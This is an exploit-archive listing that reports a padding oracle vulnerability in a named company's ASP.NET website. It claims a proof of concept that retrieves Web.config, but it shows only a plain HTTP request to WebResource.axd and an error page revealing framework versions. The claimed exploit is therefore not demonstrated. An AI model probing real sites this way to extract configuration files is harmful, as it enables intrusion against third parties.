istikbal Padding Oracle Vulnerability

2019.12.11
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

Exploit Title:istikbal Padding Oracle Vulnerability # Date:10.12.2019 # Exploit Author: Furkan Özer // Prototyqe # Vendor Homepage: istikbal.com.tr # Version: ALL # Tested on: Windows 10-Linux Kali *************************************************************************************************** This proof-of-concept exploit performs a Padding Oracle attack against a simple ASP.NET application (it can be any application) to download a file from the remote Web Server. In this example the proof-of-concept exploit downloads the Web.config file. GET /WebResource.axd HTTP/1.1 Cookie: ASP.NET_SessionId=rsdw2kouuyhy2odwcpy1vi35 Host: www.istikbal.com.tr Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* poc <!DOCTYPE html> <html> <head> <title>The resource cannot be found.</title> ****** <b> Requested URL: </b>/WebResource.axd<br><br>********* <hr width=100% size=1 color=silver> <b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.7.3062.0 </font>


Vote for this issue:
20%
80%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top